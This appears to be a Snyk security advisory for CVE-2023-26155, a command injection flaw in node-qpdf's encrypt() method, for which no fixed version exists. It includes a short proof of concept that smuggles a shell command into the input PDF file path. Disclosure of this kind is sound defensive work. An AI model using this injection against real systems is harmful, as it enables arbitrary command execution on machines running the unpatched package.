Improper Neutralization of Special Elements used in a Command Affecting node-qpdf package, versions *


Severity: high

CVSS assessment made by Snyk's Security Team.

Threat Intelligence

Exploit Maturity: Proof of concept
EPSS: 0.18% (57th percentile)

  • Snyk ID: SNYK-JS-NODEQPDF-5747918
  • published: 13 Oct 2023
  • disclosed: 30 Jun 2023
  • credit: Xiao Feng

Introduced: 30 Jun 2023

CVE-2023-26155
CWE-77

How to fix?

There is no fixed version for node-qpdf.

Overview

node-qpdf is a Node.js wrapper around QPDF that performs content-preserving transformations on PDFs.

Affected versions of this package are vulnerable to Improper Neutralization of Special Elements used in a Command (command injection): the package-exported method encrypt() does not sanitize its input parameter, which later flows into a sensitive command execution API. As a result, an attacker who can specify the input PDF file path may inject arbitrary shell commands.

PoC

var qpdf = require('node-qpdf');

var options = {
    keyLength: 128,
    password: 'YOUR_PASSWORD_TO_ENCRYPT'
};

// The input path is interpolated into a shell command unsanitized, so the
// shell metacharacters in it are interpreted as a second command.
qpdf.encrypt('test.pdf ||touch rce||', options); // a file named rce will be created

CVSS Scores: version 3.1